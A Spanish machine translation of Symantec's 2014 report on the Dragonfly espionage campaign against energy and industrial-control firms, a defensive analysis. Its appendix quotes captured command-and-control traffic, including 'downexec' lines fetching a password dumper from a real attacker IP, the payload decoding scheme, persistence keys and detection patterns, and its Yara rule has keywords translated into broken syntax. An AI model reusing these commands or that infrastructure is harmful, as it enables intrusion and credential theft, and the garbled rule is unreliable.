Suscríbete a DeepL Pro para poder traducir archivos de mayor tamaño.

Más información disponible en www.DeepL.com/pro.

RESPUESTA DE SEGURIDAD

Libélula: Ataques de ciberespionaje

contra proveedores de energía
Respuesta de seguridad de Symantec

Versión 1.21: 7 de julio de 2014, 12:00 GMT

En un principio, Dragonfly se centró en empresas de

defensa y aviación de Estados Unidos y Canadá, antes de
centrarse en empresas energéticas estadounidenses y
europeas a principios de 2013.
CONTENIDO

VISIÓN GENERAL ....................................................3

Cronología.................................................................5
Víctimas.....................................................................5
Herramientas y tácticas................................................6
Campaña de spam ...............................................6
Ataques a abrevaderos .........................................6
Software troyanizado.............................................7
Zona horaria de origen................................................7
Conclusión.................................................................8
Apéndice - Descripción técnica ..................................10
Kit de explotación Lightsout................................10
Backdoor.Oldrea ................................................11
Modificaciones del registro..................................11
Trojan.Karagany ................................................13
Indicadores de compromiso.....................................15
Kit de explotación Lightsout................................15
Backdoor.Oldrea ................................................16
Trojan.Karagany ................................................17
VISIÓN GENERAL

Una campaña de ciberespionaje contra una serie de objetivos, principalmente en el

sector energético, dio a los atacantes la capacidad de montar operaciones de sabotaje
contra sus víctimas. Los atacantes, conocidos por Symantec como Dragonfly,
consiguieron comprometer varias organizaciones de importancia estratégica con fines de
espionaje y, si hubieran utilizado las capacidades de sabotaje que tenían a su disposición,
podrían haber causado daños o interrupciones en el suministro energético de los países
afectados.

El grupo Dragonfly, que también es conocido por otros vendedores como Energetic Bear, es
un grupo capaz que evoluciona con el tiempo y se dirige principalmente al sector de la
energía y las industrias relacionadas. Llevan operando al menos desde 2011, pero es
posible que lleven activos incluso más tiempo. Dragonfly se dirigió inicialmente a
empresas de defensa y aviación en EE.UU.
y Canadá antes de centrarse en empresas energéticas estadounidenses y europeas a
principios de 2013. Entre sus objetivos más recientes figuran empresas relacionadas con
los sistemas de control industrial.

Dragonfly ha utilizado campañas de correo electrónico de spam y ataques "watering

hole" para infectar organizaciones objetivo. El grupo ha utilizado dos herramientas de
malware principales: Trojan.Karagany y Backdoor.Oldrea. Este último parece ser una
pieza de malware personalizada, escrita por o para los atacantes.
CALENDARIO

Un nuevo enfoque
utilizado por los
atacantes consiste en
comprometer el sitio
de actualización de
varios productores de
software para sistemas
de control industrial
(ICS).
 Libélula: Ataques de ciberespionaje contra proveedores de
energía

Cronología

Figura 1 Cronología de las operaciones de Dragonfly

Symantec observó intentos de spear phishing en forma de correos electrónicos con archivos PDF
adjuntos desde febrero de 2013 hasta junio de 2013. Los temas de los correos electrónicos estaban
relacionados con cuestiones de administración de oficina, como la gestión de una cuenta o problemas con
una entrega. Los objetivos identificados de esta campaña eran principalmente organizaciones
estadounidenses y británicas del sector energético.
En mayo de 2013, los atacantes comenzaron a utilizar el kit de exploits Lightsout como vector de ataque,
redirigiendo a los objetivos desde varios sitios web. El uso del kit de exploits Lightsout ha continuado hasta la
fecha, aunque de forma intermitente. El kit de exploits se ha ido actualizando con el tiempo con técnicas de
ofuscación. La versión actualizada de Lightsout pasó a conocerse como Hello exploit kit.
Un enfoque más reciente utilizado por los atacantes consiste en comprometer el sitio de actualización de
varios productores de software de sistemas de control industrial (ICS). A continuación, incluyen
Backdoor.Oldrea en una actualización legítima del software afectado. Hasta la fecha, se sabe que tres
productores de software ICS han sido comprometidos.
Los atacantes de Dragonfly utilizaron sitios web pirateados para alojar software de mando y control
(C&C). Los sitios web comprometidos parecen utilizar sistemáticamente algún tipo de sistema de gestión
de contenidos.

Víctimas
Los objetivos actuales del grupo Dragonfly, actividad maliciosa adicional- permite obtener una
basados en sitios web comprometidos y imagen más precisa de las "verdaderas" víctimas.
actualizaciones de software secuestradas, Las infecciones más activas, como en la figura 2, son
son el sector energético y los sistemas de
control industrial, en particular los basados
en Europa. Aunque la mayoría de las
víctimas se encuentran en Estados Unidos,
parece que se trata de daños colaterales. Es
decir, muchos de estos ordenadores fueron
probablemente infectados a través de
ataques de watering hole o secuestros de
actualizaciones y no son de interés para el
atacante.
El examen de las víctimas con infecciones
activas -en las que se ha detectado
Figura 2. Los 10 países con más infecciones activas

Página 5
 Libélula: Ataques de ciberespionaje contra proveedores de
energía

en España, seguida en orden por Estados Unidos, Francia, Italia y Alemania.

Herramientas y
tácticas
Dragonfly utiliza dos tipos principales de malware en sus ataques. Ambos son malware del tipo Herramienta de
Acceso Remoto (RAT) que proporcionan a los atacantes acceso y control de los ordenadores
comprometidos. La herramienta de malware favorita de Dragonfly es Backdoor.Oldrea, también conocida como
Havex o Energetic Bear RAT. Oldrea actúa como puerta trasera para los atacantes en el ordenador de la
víctima, permitiéndoles extraer datos e instalar más malware.
Oldrea parece ser un malware personalizado, escrito por el propio grupo o creado para él. Esto proporciona
alguna indicación de las capacidades y recursos que hay detrás del grupo Dragonfly. La segunda herramienta
principal utilizada por Dragonfly es Trojan.Karagany. A diferencia de Oldrea, Karagany estaba disponible en el
mercado clandestino. El código fuente de la versión 1 de Karagany se filtró en 2010. Symantec cree que
Dragonfly puede haber tomado este código fuente y haberlo modificado para su propio uso.
Symantec descubrió que la mayoría de los ordenadores comprometidos por los atacantes estaban infectados
con Oldrea. Karagany sólo se utilizó en alrededor del 5% de las infecciones. Las dos piezas de malware son
similares en funcionalidad y lo que lleva a los atacantes a elegir una herramienta sobre otra sigue siendo
desconocido.

Campaña de spam
El grupo Dragonfly ha
utilizado al menos tres
tácticas de infección contra
objetivos del sector
energético. El primer método
consistió en un ataque por
correo electrónico.
en la que algunos ejecutivos y
altos cargos de empresas objetivo
recibieron correos electrónicos
con un PDF malicioso adjunto.
Los correos electrónicos
infectados tenían uno de estos dos
asuntos "La cuenta"
o "Resolución de problema de
entrega". Todos los correos
procedían de una única dirección
de Gmail.
El gráfico 3 muestra el número de
destinatarios diferentes por día.
La campaña de spam
comenzó en febrero de 2013
y continuó
en junio de 2013. Symantec Figura 3. Actividad de las campañas de spam desde mediados de febrero de 2014
identificó siete hasta mediados de junio de 2013
organizaciones diferentes
como objetivos de este
campaña. Al menos una organización fue atacada de forma intermitente durante un periodo de 84 días.

Ataques a abrevaderos
En junio de 2013, los atacantes se centraron en los ataques de tipo watering hole. Atacaron varios sitios web
relacionados con la energía e inyectaron un iframe en cada uno de ellos. Este iframe redirigía a los visitantes
a otro sitio web legítimo comprometido que alojaba el exploit kit Lightsout. Éste, a su vez, explotaba Java o
Internet Explorer para introducir Oldrea o Karagany en el ordenador de la víctima. El hecho de que los
atacantes comprometieran varios sitios web legítimos en cada fase de la operación es una prueba más de
que el grupo tiene una gran capacidad técnica.

Página 6
 Libélula: Ataques de ciberespionaje contra proveedores de
energía

En septiembre de
2013, Dragonfly
comenzó a utilizar una
nueva versión de este
conocido como Hello
exploit kit. La página de
aterrizaje de este kit
contiene JavaScript que
toma las huellas
dactilares del sistema,
identificando los
complementos
instalados en el
navegador. A
continuación, la víctima
es redirigida a una URL
que, a su vez, determina
el mejor exploit a utilizar
en función de la
información recopilada.
La figura 4 muestra los
sitios web Figura 4. Industrias objetivo a lo largo del tiempo
comprometidos
clasificados por
sectores. El cincuenta
por ciento de los
objetivos identificados
estaban relacionados
con la industria
energética y el treinta
por ciento eran
sistemas de control de energía, como se muestra en la figura 4. En marzo de 2014 se observa un claro cambio
en los objetivos de los atacantes, cuando los sistemas de control de la energía se convierten en el objetivo
principal.

Software troyanizado
El vector de ataque más ambicioso utilizado por Dragonfly fue el compromiso de una serie de paquetes de
software legítimos. Se atacó a tres proveedores diferentes de equipos ICS y se insertó malware en los
paquetes de software que habían puesto a disposición para su descarga en sus sitios web.

Zona horaria de origen

El análisis de las marcas de tiempo de
compilación en el malware utilizado por
los atacantes indica que el grupo trabajó
principalmente entre el lunes y el
viernes, concentrándose la actividad
sobre todo en un periodo de nueve
horas que correspondía a una jornada
laboral de 9 a 18 horas en la zona
horaria UTC +4.
Figura 5. Número de muestras recopiladas por hora, zona horaria UTC

Página 7
 Libélula: Ataques de ciberespionaje contra proveedores de
energía

Figura 6. Número de muestras recopiladas por día, zona horaria UTC

Conclusión
El grupo Dragonfly es técnicamente hábil y capaz de pensar estratégicamente. Dado el tamaño de algunos de
sus objetivos, el grupo encontró un "punto débil" comprometiendo a sus proveedores, que invariablemente
son empresas más pequeñas y menos protegidas.
Página 8
ANEXO
 Libélula: Ataques de ciberespionaje contra proveedores de
energía

Apéndice - Descripción técnica

La identificación de este grupo se basa en el uso de dos familias de malware y un exploit kit. Las familias de
malware utilizadas son Backdoor.Oldrea y Trojan.Karagany. El kit de explotación se conoce como Lightsout y/o
Hello. Hello es una iteración actualizada de Lightsout que el grupo Dragonfly comenzó a utilizar en
septiembre de 2013.
El uso de Backdoor.Oldrea parece estar limitado al grupo Dragonfly. Además, instancias específicas de
Trojan. Karagany. Karagany es una RAT rusa que se vende en foros clandestinos. Las instancias de este
malware relacionadas con el grupo Dragonfly se identifican porque se distribuyen a través del exploit kit
Lightsout y también por un empaquetador concreto utilizado por este grupo. Symantec detecta el
empaquetador Trojan.Karagany utilizado por este grupo como Trojan.Karagany!gen1.
El exploit kit Lightsout es un sencillo exploit kit que se utiliza sistemáticamente para distribuir principalmente
Backdoor.Oldrea y, en varios casos, Trojan.Karagany.

Kit de explotación Lightsout

Se explotaron varios sitios que utilizan
sistemas de gestión de contenidos y se
utilizó un iframe para redirigir a los
visitantes a sitios que alojaban el exploit
kit Lightsout.
En la figura 7 puede verse un ejemplo de
iframe inyectado.
Figura 7. Ejemplo de enlace iframe inyectado
El exploit kit utiliza el navegador (por
ejemplo, Internet Explorer y Firefox) y
Java
para distribuir Backdoor.Oldrea o Trojan.Karagany.

Un ejemplo de la estructura del kit de exploits Lightsout puede verse en la Tabla 1. Nótese que los
nombres de los archivos y los exploits utilizados pueden variar.
En septiembre de Tabla 1. Ejemplos de nombres de archivos para una implementación del kit de explotación
2013, el grupo Lightsout
Dragonfly comenzó a
utilizar una nueva Página Descripción CVE
versión de Lightsout, Inden2i.php Primera página de destino N/A
también conocida Inden2i.html Segunda página de destino N/A
como Hello exploit kit. PluginDetect.js Script PluginDetect N/A
El JavaScript incluido
en la página de Stoh.html Java 6 exploit Jar request file N/A
destino redirige el Stoh.jar Exploit de Java 6 CVE-2012-1723
navegador a una URL Gami.html Java 7 exploit Jar request file N/A
que depende de las
Gami.jar Java 7 exploit CVE-2013-2465
fuentes instaladas en
el sistema, navegador Tubc.html Exploit de IE7 CVE-2012-4792
complementos, la versión Negc.html Exploit de IE8 CVE-2013-1347
del sistema operativo y el
agente de usuario. En
este punto, determina el
mejor exploit para
uso, basado en la
información proporcionada, y genera una URL apropiada para redirigir al usuario al exploit/payload apropiado.
A continuación se muestra un ejemplo de este tipo de solicitud:
[http://]compromised.example/wp-includes/pomo/
dtsrc.php?a=[EK _ PARAMETER _ DETERMINADO]
Página 10
 Libélula: Ataques de ciberespionaje contra proveedores de
energía

[EK_DETERMINED_PARAMETER] puede ser Tabla 2. Parámetros del kit de explotación Lightsout

cualquiera de los enumerados en la Tabla 2.
Página Descripción
Los parámetros dwe y dwd se refieren a la carga H2 Exploit de Java (<v1.7.17)
útil que se solicita para la descarga, por ejemplo: H3 Chrome /w Java (<1.7.17)
• Cuando se solicita una carga útil H4 IE6 y OSVer < Vista - 6
Backdoor.Oldrea H5 Java Exploit (<v1.7.17 & OSver < Vista)
[EK_DETERMINED_PARAMETER] es dwd H6 IE8 y OSVer < Vista
• Cuando se solicita una carga útil H7 Exploit de Java (<=v1.6.32)
Karagany!gen1
R2 Archivo JAR malicioso
[EK_DETERMINED_PARAMETER] se dwe
R7 Archivo JAR malicioso
Los valores de la variable
Dwe Archivo PE malicioso
[EK_DETERMINED_PARAMETER] pueden estar
relacionados con los dos tipos de archivo Dwd Archivo PE malicioso
diferentes representados por Backdoor.Oldrea y
Trojan.
Karagany!gen1. Las cargas útiles Oldrea son
archivos DLL (las URL terminan en "d" para DLL?),
mientras que las cargas útiles Karagany!gen1 son
ejecutables portátiles (las URL terminan en "e"
para EXE?).

Backdoor.Oldrea
En el núcleo de Backdoor.Oldrea hay un componente persistente que interactúa con los servidores de C&C
para descargar y ejecutar cargas útiles. Los componentes se descargan llegando al servidor de C&C y
realizando una petición GET que devuelve una página HTML que contiene una cadena codificada en base64
entre dos comentarios marcados con la cadena 'havex'.

Instalación
Modificaciones del sistema de archivos
• %Temp%\qln.dbx
• %Sistema%\TMPprovider038.dll

Modificaciones del registro

En este ejemplo concreto, el "038" del nombre del archivo indica el número de versión principal.
• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"TmProvider"
• HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"TmProvider"
• HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Internet Explorer\InternetRegistry\"fertger"
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\InternetRegistry

Inyección de código
• Backdoor.Oldrea inyecta código en explorer.exe.

Red
Tras la infección, Backdoor.Oldrea intentará recopilar información del sistema, como el sistema operativo, el
nombre de usuario, el nombre del equipo, el país, el idioma, la nación, la información de configuración del
adaptador de Internet, las unidades disponibles, el navegador predeterminado, los procesos en ejecución, la
lista de archivos del escritorio, Mis documentos, el historial de Internet, los archivos de programa y la raíz de
las unidades disponibles. También recopila datos de Outlook (libreta de direcciones) y archivos de
configuración de software relacionados con ICS. Estos datos se recogen y se escriben en un archivo
temporal de forma encriptada antes de ser POST'ed a un servidor remoto de C&C. Los siguientes son
ejemplos de una solicitud POST y una respuesta POST:

Página 11
 Libélula: Ataques de ciberespionaje contra proveedores de
energía

Ejemplo de solicitud POST:

POST /wp08/wp-includes/dtcla.php?id=285745296322896178920098FD80-20&v1=038&v2=17
0393861&q=5265882854508EFCF958F979E4 HTTP/1.1
Usuario-Agente: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
AppleWebKit/525.19 (KHTML, como Gecko) Chrome/1.0.154.36 Safari/525.19
Host: toons.freesexycomics.com
Content-Length: 0
Cache-Control: no-cache
Ejemplo de respuesta POST:
HTTP/1.1 200 OK
Fecha: Wed, 22 Jan 2014 13:40:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: Apache/1.3.37
(Unix) Cache-Control: no-
cache

9f65
<html><head><mega http-equiv='CACHE-CONTROL' content='NO-CACHE'></
head><body>¡Sin datos!<!--
havexQlpoOTFBWSZTWWYvDI0BOsD////////////////////////////////////
/////////4oB+93VVXu69DuN7XYzds9yt49Ques

[...TRUNCADO PARA LECTURA]

+yUW3zfTxWAOstsCwCckdW5 AH5Q6vbbCu7GputPt5CSfgPCAKXcAOOICMsqliACGYEhAQT3v9eD
M92D/8XckU4UJBmLwyNA==havex--></body></head>

Varias muestras procesan las respuestas de C&C de forma diferente.

En un ejemplo, la muestra busca los datos encerrados por la etiqueta 'havex'. Una vez encontrados los
datos, se descodifican utilizando base64 estándar + bzip2 y también una capa xor con bytes de la cadena
1312312. Los datos decodificados contienen una pequeña cabecera seguida de un archivo MZ ejecutable.
Se encontró otra muestra que utiliza base64 estándar + reverse xor + RSA-2048 para descifrar los datos
recibidos. Los datos descifrados consisten en un comando de 6 bytes concatenado con un archivo MZ. El
archivo MZ se comprime con el algoritmo lzma. Las claves RSA para el descifrado, junto con otra
información de configuración inicial, se almacenan en el registro en formato base64.

Cargas útiles
Esta sección incluye información sobre las cargas útiles identificadas descargadas por

Backdoor.Oldrea. A continuación se describe brevemente la funcionalidad de cada

componente identificado:
• Tmpprovider es un componente persistente que interactúa con el servidor C&C (descarga y ejecuta payloads).
• El componente InstallerFormDll suele incrustar otro ejecutable (DLL) en su sección de recursos para
ser cargado. La muestra analizada llevaba una herramienta de recuperación de contraseñas para
navegadores web procedente de http://securityxploded.com/browser-password-decryptor.php.
• El componente RunExeCmdSingle es un archivo DLL que lanza y ejecuta otro ejecutable. La
exportación 'runDll' de este archivo es donde se implementa la lógica.
• DropCommandsCmd es un módulo de limpieza, utilizado para eliminar rastros de sí mismo del ordenador
infectado.
• Los módulos GetFileCmd comprueban la existencia de archivos específicos en el host infectado. Las dos
muestras buscan el archivo de software relacionado con ICS y el archivo de libreta de direcciones de
autocompletar de Outlook (outlook.nk2).
Página 12
 Libélula: Ataques de ciberespionaje contra proveedores de
energía

Trojan.Karagany
Trojan.Karagany es una puerta trasera utilizada principalmente para el reconocimiento. Está diseñada para
descargar e instalar archivos adicionales y filtrar datos. Las muestras a veces utilizan empaquetadores
binarios comunes como UPX y Aspack sobre un empaquetador/protector binario Delphi personalizado para la
carga útil. Cuando está presente en las muestras, el empaquetador Delphi está configurado para utilizar
"neosphere" como clave para descifrar la carga útil.
A continuación se ofrece un breve resumen de la funcionalidad de Trojan.Karagany:
• Puede cargar, descargar y ejecutar archivos en el sistema
• Tiene capacidad para plugins (puede cargar varios plugins para añadir funciones, como Web Injects).
• La carga útil tiene un tamaño aproximado de 72 Kb y está programada en C/C++.
• Contiene un pequeño archivo DLL incrustado que supervisa las API de envío y envío de
WSASend para capturar las credenciales de "autenticación básica".
Instalación
Trojan.Karagany crea una carpeta en el directorio APPDATA del usuario y elige el nombre del directorio de la
siguiente lista:
• Servicios WCF de Microsoft
• Servicios de intermediación
• Utilidades Flash
• Programas del Centro Multimedia
• Definiciones de las políticas
• Herramientas web de Microsoft
• Conjuntos de referencia
• Servicios de análisis
• Información sobre InstallShield
• IIS Servidor SQL
• Diagnóstico
• Rendimiento de NTAPI
• Plataforma WPF
Se copia en el directorio creado con atributos ocultos y de sistema utilizando un nombre de archivo
elegido de la siguiente lista:
• SearchIndexer.exe
• ImeBroker.exe
• fsutil.exe
• PnPutil.exe
• BdeUISrv.exe
• WinSAT.exe
• pwNative.exe
• SnippingTool.exe
• DFDWizard.exe
• PrintBrmEngine.exe
• WbemMonitor.exe
• dxpserver.exe
• PowerMng.exe
Página 13
 Libélula: Ataques de ciberespionaje contra proveedores de
energía

Trojan.Karagany se copia a sí mismo con atributos ocultos y del sistema donde se ejecutó por primera vez como
err.log[DIGITS]. A continuación, copia la utilidad chkdsk legítima en la carpeta de instalación utilizando el nombre
de archivo de la carga útil pero con un espacio antes de la extensión del archivo. Esto puede engañar a los
usuarios normales haciéndoles creer que esta carpeta contiene una aplicación legítima, por ejemplo PnPutil .exe.
Trojan.Karagany!gen1 puede crear los siguientes archivos adicionales en la carpeta de instalación:
• Formulario.api
• inact.api
• prog.cer
• Cent.api
• ie.pdb
A continuación, crea un directorio C:\ProgramData\Mail\MailAg\gl como un directorio temporal utilizado para cargar
archivos. Trojan.Karagany luego crea un enlace a sí mismo en la carpeta de inicio como un inicio automático
cuando se reinicia el sistema.

Red
Trojan.Karagany comprueba primero si hay una conexión a Internet activa visitando sitios web de Microsoft o
Adobe. Sólo se comunicará con su servidor de C&C cuando esta comprobación tenga éxito.

Ejemplo de solicitud HTTP

Prueba de conexión a Internet con Microsoft
GET /es-us/default.aspx HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Host: microsoft.com
Cookie: MC1=V=3&GUID=<32 character guid>
Connection: Keep-Alive
Cache-control: no-cache
Prueba de conexión a Internet con Adobe mediante parámetro identificador
POST /geo/productid.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: adobe.com
...
identifiant=51032 _ 175129256364
Ejemplo de solicitud POST para el registro en el servidor de C&C
POST /comprobar _valor.php HTTP/1.1
Usuario-Agente: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; .NET CLR
2.0.50727)
Host: 93.188.161.235
...
identifiant=51032 _ 1799883375637&version=i2pver
Ejemplo de respuesta HTTP
HTTP/1.1 200 OK
Fecha: Tue, 28 Jan 2014 05:59:58 GMT
Vary: Accept-Encoding
Content-Length: 324
Content-Type:
text/html
X-Powered-By: PHP/5.3.10-1ubuntu3.9
Via: 1.1 host.alexsieff.com

work:3|downexec [http://]93.188.161.235/check2/muees27jxt/shot.jpg;
work:5|downexec [http://]93.188.161.235/check2/muees27jxt/tl.jpg;
work:7|downexec [http://]93.188.161.235/check2/muees27jxt/fl.jpg;
work:103|downexec [http://]93.188.161.235/check2/muees27jxt/pdump.jpg;
work:118|downexec [http://]93.188.161.235/check2/muees27jxt/fl.jpg;
Página 14
 Libélula: Ataques de ciberespionaje contra proveedores de
energía

Los datos POST contienen la versión del sistema operativo y un número derivado:
• identifiant=[VERSION SO]_[NÚMERO DERIVADO]

Los tokens de User-Agent utilizados en las peticiones de C&C están codificados. Se han observado los dos ejemplos
siguientes:
• Mozilla/17.0 (compatible; MSIE 8.0; Windows NT 6.1; .NET CLR 2.0.50727; .NET CLR 3.5.30729)
• Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; .NET CLR 2.0.50727; .NET CLR 3.5.30729)

Componentes descargados
• pdump.jpg - Se utiliza para volcar las contraseñas en \ProgramData\Mail\MailAg\pwds.txt. Necesita la biblioteca
'vaultcli.dll
• fl.txt - Se utiliza para listar archivos RTF, PST, DOC, XLS, PDF, *pass*.*, *secret*.* en
\ProgramData\Mail\MailAg\fls.txt
• tl.jpg - Se utiliza para listar las tareas en ejecución mediante la utilidad 'tasklist
• shot.jpg - Se utiliza para la captura de pantalla del escritorio, el archivo se guarda en
\ProgramData\Mail\MailAg\shot.png

Indicadores de compromiso

Kit de explotación Lightsout

Pozos de agua
Tabla 3. Sitios de exploits detectados que alojan el kit de exploits Lightsout y referencia
Sitio web infectado Industria de sitios Nacionalid Explotar el sitio Visto por última
web infectados ad del sitio vez
web
infectado
www.s[REDACTED]e.az Servicio de alojamiento Azerbaiyán blog.olioboard.com 18/06/2014 01:19
de archivos
www.t[REDACTED]e.no Sistemas de control de Noruega www.manshur.ir 24/05/2014 10:53
la energía
www.s[REDACTED]e.az Servicio de alojamiento Azerbaiyán realstars.ir 06/05/2014 22:20
de archivos
s[REDACTED]e.az Servicio de alojamiento Azerbaiyán realstars.ir 06/05/2014 23:30
de archivos
www.f[REDACTED]y.com Energía Americana aptguide.3dtour.com 11/04/2014 12:26
www.t[REDACTED]e.no Sistemas de control de Noruega seductionservice.com 07/04/2014 06:42
la energía
www.a[REDACTED]t.it Sistemas de control de Italiano seductionservice.com 06/04/2014 22:25
la energía
www.e[REDACTED]t.it Sistemas de control de Italiano seductionservice.com 05/04/2014 22:57
la energía
b[REDACTED]n.in Sistemas de control de India mahsms.ir 23/03/2014 23:01
la energía
www.v[REDACTED]z.com Energía Francés mahsms.ir 21/03/2014 22:30
www.r[REDACTED]e.fr Energía Francés mahsms.ir 14/03/2014 04:30
www.e[REDACTED]m.eu Energía Francés aptguide.3dtour.com 04/03/2014 21:27
www.r[REDACTED]e.fr Energía Francés keeleux.com 30/11/2013 06:57
www.v[REDACTED]z.com Energía Francés keeleux.com 11/10/2013 12:18
Página 15
 Libélula: Ataques de ciberespionaje contra proveedores de
energía

Detección de solicitud HTTP de carga útil Lightsout

Expresión regular para búsquedas en URL o líneas de petición HTTP:
• [^=]*=(dw[de]|fn[de])$

Backdoor.Oldrea

Tabla 4. Servidores de C&C Oldrea detectados recientemente por

Symantec
Nombre de host Visto por primera Visto por última
vez vez
a[REDACTED]e.com 25/02/2014 15:57 23/06/2014 21:06
e[REDACTED]k.ru 25/02/2014 18:47 23/06/2014 20:51
r[REDACTED]r.ru 25/02/2014 15:44 23/06/2014 17:21
l[REDACTED]l.net 25/02/2014 15:54 23/06/2014 12:51
c[REDACTED]b.ru 25/02/2014 22:37 23/06/2014 12:13
l[REDACTED]r.ru 05/03/2014 14:00 22/06/2014 22:06
p[REDACTED]3.ru 11/06/2014 03:34 22/06/2014 06:18
r[REDACTED]a.com 30/04/2014 00:07 17/06/2014 22:57
7[REDACTED]t.com 26/02/2014 09:43 13/06/2014 08:59
s[REDACTED]s.com 29/04/2014 23:43 13/06/2014 02:55
www.r[REDACTED]l.com 05/03/2014 19:18 19/03/2014 17:21
w[REDACTED]c.org 26/02/2014 04:51 11/03/2014 23:30
s[REDACTED]s.com 06/09/2013 04:03 16/01/2014 23:54
s[REDACTED]f.com.ua 14/01/2014 21:46 16/01/2014 22:49
d[REDACTED]k.com 14/01/2014 08:46 16/01/2014 22:48
z[REDACTED]k.com 14/01/2014 21:47 16/01/2014 22:47
blog.o[REDACTED]d.com 19/09/2013 07:12 16/01/2014 22:40
a[REDACTED]l.com 06/09/2013 04:41 16/01/2014 20:52
a[REDACTED]r.com 19/09/2013 01:44 15/01/2014 05:57
k[REDACTED]x.com 20/09/2013 00:22 26/09/2013 04:25
blog.k[REDACTED]x.com 20/09/2013 04:04 25/09/2013 07:57
dl.3[REDACTED]e.com 28/08/2013 06:38 06/09/2013 10:07
j[REDACTED]p.co.jp 28/08/2013 06:33 06/09/2013 09:37
s[REDACTED]e.net 28/08/2013 09:12 06/09/2013 03:54

Detección de peticiones HTTP de C&C de Oldrea

• \.php\?id=[0-9A-F]{28}.{0,5}&v1=[0-9]{1,5}&v2=[0-9]{1,10}&q=[0-9A-F]{20}

Detección de archivos creados durante la instalación

Expresión regular para búsquedas en el sistema de archivos:
• (TMPprovider[0-9]{3}\.dll|sy[ds]main\.dll)
Página 16
 Libélula: Ataques de ciberespionaje contra proveedores de
energía

Cambios en el registro realizados durante la instalación

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"TmProvider"
• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"TmProvider"

Trojan.Karagany
• 91.203.6.71
• 93.171.216.118
• 93.188.161.235

Formato de los datos de la solicitud POST inicial realizada al servidor de C&C

• identifiant=[VERSION SO]_[NÚMERO DERIVADO]

Peticiones HTTP para cargar datos con el formato:

• filename=[NOMBRE DEL ARCHIVO]&identifiant=[INFO DERIVADA DEL SO]&fichier=[DATOS CODIFICADOS DEL
ARCHIVO].

Regla de Yara
Gobierno de Karagany Yara:
norma privada isPE
{
estado:
uint16(0) == 0x5A4D y uint32(uint32(0x3c)) == 0x00004550
}

regla Trojan _ Karagany

{
meta:
alias = "Dreamloader"

cuerdas:
$s1 = "neosphere" ascii ancho
$s2 = "10000000000051200" ascii ancho
$v1 = "&fichier" ascii ancho
$v2 = "&identifiant" ascii ancho
$c1 = "xmonstart" ascii ancho
$c2 = "xmonstop" ascii ancho
$c3 = "xgetfile" ascii ancho
$c4 = "downadminexec" ascii ancho
$c5 = "xdiex" ascii ancho
$c6 = "xrebootx" condición ascii
ancha:
isPE y (($s1 y $s2) o ($v1 y $v2) o (cualquiera de ($c*)))
}
Página 17
Autores
Respuesta de seguridad de Symantec

Acerca de Symantec
Symantec protege la información del mundo y es
líder mundial en soluciones de seguridad, copia de
seguridad y disponibilidad. Nuestros productos y servicios
innovadores protegen a las personas y la información en
cualquier entorno, desde el dispositivo móvil más pequeño
hasta el centro de datos de la empresa y los sistemas
basados en la nube.

Nuestra experiencia líder en el sector en la

protección de datos, identidades e interacciones ofrece a
nuestros clientes confianza en un mundo conectado.
Para más información, visite www.symantec.com o
póngase en contacto con Symantec en
go.symantec.com/socialmedia.

Con sede en Mountain View

(California), Symantec opera en 40
países.
Más información en www.symantec.com.

Para conocer las oficinas de cada país y los números de contacto, visite nuestro sitio web.

Sede mundial de Symantec Copyright © 2014 Symantec Corporation.

350 Ellis St. Todos los derechos reservados. Symantec, el
logotipo de Symantec y el logotipo de la marca
Mountain View, CA 94043 de verificación son marcas comerciales o
EE.UU. marcas comerciales registradas de Symantec
+1 (650) 527-8000 Corporation o sus filiales en Estados Unidos y
1 (800) 721-3934 otros países. Otros nombres pueden ser
www.symantec.com marcas comerciales de sus
respectivos
propietarios.

Cualquier información técnica puesta a disposición por Symantec Corporation es obra protegida por derechos de autor de Symantec Corporation y es
propiedad de Symantec Corporation.
SIN GARANTÍA . La información técnica se suministra tal cual y Symantec Corporation no garantiza su exactitud ni su uso. Cualquier uso de la
documentación técnica o de la información aquí contenida es por cuenta y riesgo del usuario. La documentación puede incluir imprecisiones técnicas o
de otro tipo o errores tipográficos. Symantec se reserva el derecho a realizar cambios sin previo aviso.